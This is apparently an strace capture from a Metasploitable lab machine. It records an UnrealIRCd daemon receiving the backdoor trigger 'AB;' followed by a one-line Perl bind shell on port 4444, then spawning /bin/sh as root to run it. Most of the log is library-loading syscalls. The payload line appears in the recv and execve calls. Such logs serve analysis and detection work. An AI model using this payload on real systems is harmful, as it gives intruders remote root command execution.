4519  07:43:27.436533 select(1024, [2 3 4 7 9], [], NULL, {0, 970000}) = 1 (in [2], left {0, 830000})

4519  07:43:27.577613 clock_gettime(CLOCK_MONOTONIC, {3017, 394634211}) = 0

4519  07:43:27.577635 accept(2, 0, NULL) = 5

4519  07:43:27.577656 getpeername(5, {sa_family=AF_INET, sin_port=htons(36439), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:27.577688 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:27.577700 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:27.577725 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:27.577738 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:27.577777 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:27.577789 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:27.577818 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:27.577835 clock_gettime(CLOCK_MONOTONIC, {3017, 394849034}) = 0

4519  07:43:27.577848 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:27.577860 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:27.577869 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:27.577879 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:27.577889 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:27.577905 send(6, "\212)\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:27.578051 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:27.578074 gettimeofday({1495626207, 578078}, NULL) = 0

4519  07:43:27.578086 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:43:27.581010 clock_gettime(CLOCK_MONOTONIC, {3017, 398025432}) = 0

4519  07:43:27.581025 recvfrom(6, "\212)\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\n\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:27.581065 close(6)          = 0

4519  07:43:27.581080 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:27.581094 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:43:27.581152 time(NULL)        = 1495626207

4519  07:43:27.581164 time(NULL)        = 1495626207

4519  07:43:27.581176 gettimeofday({1495626207, 581179}, NULL) = 0

4519  07:43:27.581187 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:27.581226 clock_gettime(CLOCK_MONOTONIC, {3017, 398240109}) = 0

4519  07:43:27.581239 gettimeofday({1495626207, 581244}, NULL) = 0

4519  07:43:27.581333 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 340000})

4519  07:43:28.235896 clock_gettime(CLOCK_MONOTONIC, {3018, 52905321}) = 0

4519  07:43:28.235896 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:43:28.235897 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235897 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235897 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235897 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235898 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235898 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235898 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235898 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235898 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235899 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235899 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235899 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235899 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235900 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235926 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235942 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235955 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235969 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235983 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.235997 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.236011 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.236024 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:28.236041 gettimeofday({1495626208, 236045}, NULL) = 0

4519  07:43:28.236053 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:28.236095 clock_gettime(CLOCK_MONOTONIC, {3018, 53107967}) = 0

4519  07:43:28.236107 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:28.236136 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:28.236156 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:28.236168 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:28.236184 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12648

12648 07:43:28.236254 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12648 07:43:28.236269 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12648 07:43:28.236279 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12648 07:43:28.236293 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12648 07:43:28.236398 brk(0)            = 0x80f9000

12648 07:43:28.236429 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.236448 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f30000

12648 07:43:28.236465 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.236482 open("/etc/ld.so.cache", O_RDONLY) = 1

12648 07:43:28.236495 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12648 07:43:28.236514 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f28000

12648 07:43:28.236524 close(1)          = 0

12648 07:43:28.236535 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.236551 open("/lib/libncurses.so.5", O_RDONLY) = 1

12648 07:43:28.236564 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12648 07:43:28.236663 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12648 07:43:28.236680 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef8000

12648 07:43:28.236693 mmap2(0xb7f25000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f25000

12648 07:43:28.236712 close(1)          = 0

12648 07:43:28.236724 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.236738 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12648 07:43:28.236752 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12648 07:43:28.236843 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12648 07:43:28.236859 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef4000

12648 07:43:28.236870 mmap2(0xb7ef6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef6000

12648 07:43:28.236886 close(1)          = 0

12648 07:43:28.236897 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.236911 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12648 07:43:28.236934 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12648 07:43:28.237023 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12648 07:43:28.237040 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef3000

12648 07:43:28.237054 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da4000

12648 07:43:28.237068 mmap2(0xb7eed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eed000

12648 07:43:28.237083 mmap2(0xb7ef0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000

12648 07:43:28.237097 close(1)          = 0

12648 07:43:28.237120 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da3000

12648 07:43:28.237132 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da36b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12648 07:43:28.237188 mprotect(0xb7eed000, 4096, PROT_READ) = 0

12648 07:43:28.237224 munmap(0xb7f28000, 29913) = 0

12648 07:43:28.237250 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.237265 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12648 07:43:28.237284 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9efbb0) = -1 ENOTTY (Inappropriate ioctl for device)

12648 07:43:28.237314 brk(0)            = 0x80f9000

12648 07:43:28.237323 brk(0x80fa000)    = 0x80fa000

12648 07:43:28.237335 brk(0x80fb000)    = 0x80fb000

12648 07:43:28.237351 getuid32()        = 0

12648 07:43:28.237361 getgid32()        = 0

12648 07:43:28.237370 geteuid32()       = 0

12648 07:43:28.237379 getegid32()       = 0

12648 07:43:28.237392 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.237406 time(NULL)        = 1495626208

12648 07:43:28.237449 brk(0x80fc000)    = 0x80fc000

12648 07:43:28.237482 brk(0x80fd000)    = 0x80fd000

12648 07:43:28.237502 open("/proc/meminfo", O_RDONLY) = 1

12648 07:43:28.237523 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12648 07:43:28.237542 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2f000

12648 07:43:28.237554 read(1, "MemTotal:      1035240 kB\nMemFree:        308388 kB\nBuffers:         89464 kB\nCached:         475928 kB\nSwapCached:          0 kB\nActive:         258156 kB\nInactive:       436168 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        308148 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5288 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            21216 kB\nSReclaimable:    12348 kB\nSUnreclaim:       8868 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12648 07:43:28.237637 close(1)          = 0

12648 07:43:28.237648 munmap(0xb7f2f000, 4096) = 0

12648 07:43:28.237660 brk(0x80fe000)    = 0x80fe000

12648 07:43:28.237687 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12648 07:43:28.237700 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12648 07:43:28.237712 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12648 07:43:28.237724 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12648 07:43:28.237735 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12648 07:43:28.237747 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12648 07:43:28.237761 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.237772 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12648 07:43:28.237785 uname({sys="Linux", node="metasploitable", ...}) = 0

12648 07:43:28.237834 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12648 07:43:28.237852 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12648 07:43:28.237870 brk(0x8100000)    = 0x8100000

12648 07:43:28.237882 getcwd("/etc/unreal", 4096) = 12

12648 07:43:28.237896 getpid()          = 12648

12648 07:43:28.237920 getppid()         = 4519

12648 07:43:28.237976 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12648 07:43:28.237996 stat64("/sbin/sh", 0xbf9efb88) = -1 ENOENT (No such file or directory)

12648 07:43:28.238013 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12648 07:43:28.238030 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12648 07:43:28.238055 socket(PF_FILE, SOCK_STREAM, 0) = 1

12648 07:43:28.238068 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12648 07:43:28.238079 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12648 07:43:28.238101 close(1)          = 0

12648 07:43:28.238113 socket(PF_FILE, SOCK_STREAM, 0) = 1

12648 07:43:28.238123 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12648 07:43:28.238133 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12648 07:43:28.238151 close(1)          = 0

12648 07:43:28.238165 open("/etc/nsswitch.conf", O_RDONLY) = 1

12648 07:43:28.238179 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12648 07:43:28.238195 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2f000

12648 07:43:28.238207 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12648 07:43:28.238256 read(1, "", 4096) = 0

12648 07:43:28.238266 close(1)          = 0

12648 07:43:28.238275 munmap(0xb7f2f000, 4096) = 0

12648 07:43:28.238291 open("/etc/ld.so.cache", O_RDONLY) = 1

12648 07:43:28.238304 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12648 07:43:28.238320 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f28000

12648 07:43:28.238330 close(1)          = 0

12648 07:43:28.238341 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.238356 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12648 07:43:28.238371 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12648 07:43:28.238469 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12648 07:43:28.238487 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9a000

12648 07:43:28.238499 mmap2(0xb7da1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7da1000

12648 07:43:28.238516 close(1)          = 0

12648 07:43:28.238528 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.238541 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12648 07:43:28.238555 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12648 07:43:28.238646 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12648 07:43:28.238663 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d82000

12648 07:43:28.238674 mmap2(0xb7d96000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d96000

12648 07:43:28.238689 mmap2(0xb7d98000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d98000

12648 07:43:28.238703 close(1)          = 0

12648 07:43:28.238729 munmap(0xb7f28000, 29913) = 0

